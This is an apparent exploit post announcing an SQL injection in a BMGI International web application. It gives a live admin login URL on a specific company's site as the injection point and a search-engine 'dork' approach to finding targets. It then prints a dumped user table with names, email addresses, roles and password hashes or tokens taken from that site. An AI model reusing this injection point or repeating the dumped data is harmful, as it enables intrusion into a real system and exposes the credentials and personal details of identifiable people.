==================================================================================================================================== | # Title : BMGI International Sql injection Vulnerability | | # Author : indoushka | | # Telegram : @indoushka | | # Tested on : windows 10 Français V.(Pro) | | | # Vendor : http://www.bmgi-international.com/ | | # Dork : n/a | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] inject here : http://www.scimat.dz/_Admin_root/authentification.php?lang=1&pw=1&user=yymfqisv Database : scimat_scimat Table : w4rk6h_dash [4 entries] +---------+--------------------+-----------+--------------------------------+---------------------------------------------+ | user_id | user_nom | user_role | user_email | user_password | +---------+--------------------+-----------+--------------------------------+---------------------------------------------+ | 8 | bmgi international | 1 | contact@pixastudio.com | -oyd3vtYORf-YzGbkcYngAdFWq756npAaT0dMhkTTiU | | 15 | bentoumi | 1 | ahmed-riadh.bentoumi@scimat.dz | u3K-ZsJi9OxXsGr_Smu15zPmDfyiYl5jwfQsZug5_x0 | | 16 | sce-clientele | 2 | sce-clientele@scimat.dz | lDViIBP9LHfGoP0DTXgLCV5SKO0cWEszBie5njfJ_m0 | | 18 | sce-programmation | 1 | sce-programmation@scimat.dz | lDViIBP9LHfGoP0DTXgLCV5SKO0cWEszBie5njfJ_m0 | +---------+--------------------+-----------+--------------------------------+---------------------------------------------+ Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh | | =======================================================================================================================================